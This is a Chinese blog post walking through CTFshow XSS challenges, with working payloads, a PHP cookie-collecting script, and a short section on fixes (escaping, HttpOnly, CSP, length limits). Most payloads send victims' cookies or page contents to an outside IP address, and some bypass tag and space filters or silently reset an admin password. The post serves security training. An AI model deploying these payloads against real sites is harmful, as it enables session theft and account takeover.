day38 XSS跨站&绕过修复&http_only&CSP&标签符号

最新推荐文章于 2025-01-17 13:51:06 发布
原创 最新推荐文章于 2025-01-17 13:51:06 发布 · 710 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

XSS绕过-CTFSHOW-361到331关卡绕过WP

前言:

document.cookie//获取当前浏览器cookie信息

windows.location.her="xxxx.com'去访问目标网站

GET.PHP?

<?PHP

$cookie=$_GET['c'];

$myfile = fopen("cookie.txt","w"); //打开一个文件,以写入的方式

fwrite($myfile,$cookie);//将cookie变量的值写入到$myfile

fclose($myfile);//关闭这个文件

?>

XSS绕过-CTFSHOW-361到331关卡绕过WP


绕过:https://xz.aliyun.com/t/4067

反射型


316-反射型-直接远程调用
<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>

317-反射型-过滤<script>
<img src=1 onerror=window.location.href='http://47.94.236.117/get.php?c='+document.cookie;>

318 319-反射型-过滤<img>
<input onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
<svg onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">

320-326-反射型-过滤空格
<svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">

存储型


327-存储型-无过滤
<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>

328-存储型-注册插入JS
<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>

329-存储型-失效凭据需1步完成所需操作//session失效,那么我们只能通过获取当前页面的源代码
<script>
$('.laytable-cell-1-0-1').each(function(index,value){
if(value.innerHTML.indexOf('ctf'+'show')>-1){
window.location.href='http://47.94.236.117/get.php?c='+value.innerHTML;
}
});
</script>

330-存储型-借助修改密码重置管理员密码(GET)
<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>
<script>src='http://127.0.0.1/api/change.php?p=123';</script>//比较隐藏

331-存储型-借助修改密码重置管理员密码(POST)
<script>$.ajax({url:'http://127.0.0.1/api/change.php',type:'post',data:{p:'123'}});</script>
 

XSS修复-过滤函数&http_only&CSP&长度限制


1、过滤一些危险字符,以及转义& < > " ' 等危险字符
自定义过滤函数引用


2、HTTP-only Cookie(不让js函数读取cookie)
https://www.php.cn/php-ask-457831.html
php.ini设置或代码引用
session.cookie_httponly =1
ini_set("session.cookie_httponly", 1);


3、设置CSP(Content Security Policy)
https://blog.youkuaiyun.com/a1766855068/article/details/89370320
header("Content-Security-Policy:img-src 'self' ");


4、输入内容长度限制,实体转义等

38、WEB攻防——通用漏洞&XSS跨站&绕过修复&http_only&CSP&标签符号
qq_55202378的博客
01-27 1642
简单来说,就是搭建服务器,并准备有一个接收cookie的文件,在前端插入js代码以获取当前用户的cookie并将cookie信息发送到你搭建的服务器上。ctfshow后台有一个机器人,它会定期访问你上传的包含payload的页面。思路:后台管理员有功能页面,能够查看注册用户到的账号密码。如果将注册的账号密码写成JS代码(获取cookie),在管理员查看账号密码的时候会不会触发JS。思路:既然cookie失效很快,就不采取通过获取cookie再登录后台这个思路。换个思路,直接通过JS代码获取网页源代码。
XSS进阶之CSP绕过
ChuMeng1999的博客
11-15 897
script-src”限制外部脚本的加载,strict-dynamic特性允许将信任关系传递给由受信任的script动态生成的脚本,忽略了script-src的白名单,使得之后生成的脚本可以执行。CSP中的strict-dynamic特性允许将信任关系传递给动态生成的脚本,可以绕过script-src白名单限制,使得当从客户端插入JS时可以被解释执行。上述POC的作用是使我们注入的代码成为受信任的js脚本,从而绕过CSP的白名单的限制。尝试构造语句使浏览器执行弹出对话框的脚本。3.了解CSP的一些特性。
xssCSP bypass
weixin_50464560的博客
08-09 1433
0x01 庐山真面目 —— 何为CSP 看到标题,是否有点疑惑 CSP 是什么东东。简单介绍一下就是浏览器的安全策略,如果 标签,或者是服务器中返回 HTTP 头中有 Content-Security-Policy 标签 ,浏览器会根据标签里面的内容,判断哪些资源可以加载或执行。 为了研究CSP(Content Security Policy)对XSS攻击的防护作用,他们做了对CSP安全模型的首次深入分析,分析了CSP标准中对web缺陷的保护能力,帮助识别常见的CSP策略配置的可能错误,并且展示了三类能使
使用无括号的XSS绕过CSP策略研究
weixin_46236101的博客
10-14 853
研究目标 绕过一个严格CSP策略 default-src ‘self’; script-src ‘self’; 技巧点一,无CSP的前提下执行任意XSS payload window.name=eval(alert(1)) location=name 说明: window.name是可以跨域的,这恶意网站上设置window.name,再让受害者访问有xss漏洞的网站,注入xss payload,location=name,即可在有长度限制前提下,执行任意的xss代码。 这个操作绕不过CSP。 技巧点二,ja
合天-web安全-xss-XSS进阶之CSP绕过
weixin_38131137的博客
03-29 734
XSS进阶之CSP绕过 基础知识: CSP:实质就是白名单制度,它规定哪些外部资源可以加载和执行。它的实现和执行全部由浏览器完成。资源加载通过”script-src“、”style-src”等选项来限制外部资源的加载。”script-src”限制外部脚本的加载,strict-dynamic特性允许将信任关系传递给由受信任的script动态生成的脚本,忽略了script-src的白名单,使得之后生成...
WEB攻防-通用漏洞_XSS跨站_绕过修复_http_only_CSP_标签符号
最新发布
weixin_45534587的博客
01-17 1708
alert(1)
DAY52WEB 攻防-XSS 跨站&反射型&存储型&DOM 型&标签闭合&输入输出&JS 代码解析
m0_74402888的博客
10-16 1128
解决方式:使用特定的语句进行替换,如**x onerror=”alert(1)”**如果你将 onerror="alert(1)" 嵌入到某个 HTML 元素中,那么当该元素加载失败时(例如图像加载失败、脚本加载失败等),JavaScript 中的 alert(1) 将会被执行,弹出一个带有 “1” 的警告框。通过URL访问该页面http://192.168.137.1:84/domxss.html#https://www.baidu.com)并在**#后面跟上,想要跳转的页面,访问即可成功跳转**
DAY55WEB 攻防-XSS 跨站&CSP 策略&HttpOnly 属性&Filter 过滤器&标签闭合&事件触发
m0_74402888的博客
10-18 1312
工具使用参考地址:https://blog.youkuaiyun.com/weixin_50464560/article/details/120384706。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单(当外部资源不在白名单内,禁止网站访问外部资源),常用标签:https://www.freebuf.com/articles/web/340080.html。环境下载:https://github.com/Re13orn/xss-lab。禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。
xss跨站之waf绕过安全修复(28)
san3144393495的博客
05-28 2124
然后访问还是正常的,这个就是特殊符号干扰方法,常见的就是#,因为#在web里面是注释的,他是通用的,特符都可以用来干扰,有一些符号就是截断或者注释的做用,代码去匹配一些关键字的时候,防止他匹配的后面或者前面的关键字,来绕过。因为xss,他的执行效果可以由多个代码实现,就是用到其他的函数,功能来替换,在跨站中想实现那种功能,也是可以应用到不同的操作语句去实现同一个目的,比如下面这串代码,取得的功能是一样的,去掉最后字符串,访问还是拦截,再去掉alert(1),访问还是拦截,再去掉尖括号里面一个字符。
支持跨域的html标签
热门推荐
冰雪遇流年的博客
08-26 1万+
html中的script、img的src属性支持跨区,浏览器对其没有限制 发送的请求都是get请求script 1.script标签具有可跨域的特性,浏览器对它不限制 2.假设不加dataType:jsonp, jquery底层默认发送XMLHttpRequest请求。 当用dataType:jsonp,jquery底层创建了script标签,src=”跨域的地
可以跨域的三个标签
weixin_30371875的博客
11-01 878
一,有三个标签允许跨域加载资源: 1,&lt;img src=xxx&gt; 2,&lt;link href=xxx&gt; 3,&lt;script src=xxx&gt; 二,三个标签的场景 1,&lt;img&gt;用于打点统计,统计网站可能是其他域 2,&lt;link&gt; &lt;script&gt;可以使用CDN,CDN的也会其他域 3,&lt;script&gt;可...
xss防护绕过
m0_62773959的博客
05-18 1019
1、XSS跨站-原理&攻击&分类等2、XSS跨站-反射型&存储型&DOM型等3、XSS跨站-攻击手法&劫持&盗取凭据等4、XSS跨站-攻击项目&XSS平台&Beef-XSS
xss加载但没反应——CSP简介与绕过
不想当脚本小子的脚本小子
02-08 3255
如果xss加载了但是没反应,可能是有CSP—内容安全策略——可以抓包看看有没有Content-Security-Policy 内容安全策略(CSP),其核心思想十分简单:网站通过发送一个 CSP 头部,明确告诉客户端(制定比较严格的策略和规则),来告诉浏览器什么是被授权执行的与什么是需要被禁止的。即使攻击者发现漏洞,但是它是没办法注入脚本的其被誉为专门为解决XSS攻击而生的神器。 简单来说,就是我们能够规定,我们的网站只接受我们指定的请求资源。 使用 CSP 配置内容安全策略涉及到添加 Co...
CSP绕过
weixin_42478365的博客
05-10 3815
01 比赛中常见的绕过CSP 目前在比赛中常见的绕过 CSP 一般是: script-src 'self' 'unsafe-inline' script-src 'self' 'unsafe-eval' script-src 'nonce-*' xx-src self script-src ‘self’ 代表着只能加载符合同源策略的文件,直接插入至 html 页面中的静态 script 标签将无法执行。结合其他 CSP 来看,常用的 iframe,object 等标签也是无法被绕过的。 下面分别分析
详细了解CSP绕过
2301_79323180的博客
04-28 2942
CSP(Content Security Policy)即内容安全策略,为了缓解很大一部分潜在的跨站脚本问题,浏览器的扩展程序系统引入了内容安全策略(CSP)的一般概念。这将引入一些相当严格的策略,会使扩展程序在默认情况下更加安全,开发者可以创建并强制应用一些规则,管理网站允许加载的内容。CSP的实质就是白名单机制,对网站加载或执行的资源进行安全策略的控制。
XSS总结(含绕过)
weixin_50464560的博客
07-28 1244
XSS总结 By七友 / 2019-02-16 09:42:00 / 浏览数 35528 &lt;span class="content-...
实验30:xss绕过思路讲解和案例演示
qq_44720671的博客
04-29 588
xss绕过思路 xss的常见绕过方法: 一、前端限制绕过(如字符长度限制),直接抓包重放,或修改html前端代码 二、大小写。比如:&lt; scRIPT&gt;aleRT(111)&lt;/ scrIPT&gt;(可绕过大写过滤或者小写过滤) 三、拼凑:&lt;scri&lt; script&gt;pt&gt;alert(111)&lt;/scri&lt;/ script&gt;pt&gt;(防...
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 9291
XSS绕过-合集】
利用反射型XSS二次注入绕过CSP form-action限制
weixin_30379911的博客
04-20 282
利用反射型XSS二次注入绕过CSP form-action限制 翻译:SecurityToolkit 0x01 简单介绍 CSP(Content-Security-Policy)是为了缓解XSS而存在的一种策略, 开发者可以设置一些规则来限制页面可以加载的内容.那文本中所说的form-action又是干啥的呢?用他可以限制form标签"action"属性的指向页面, 这样可以防止攻击者...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值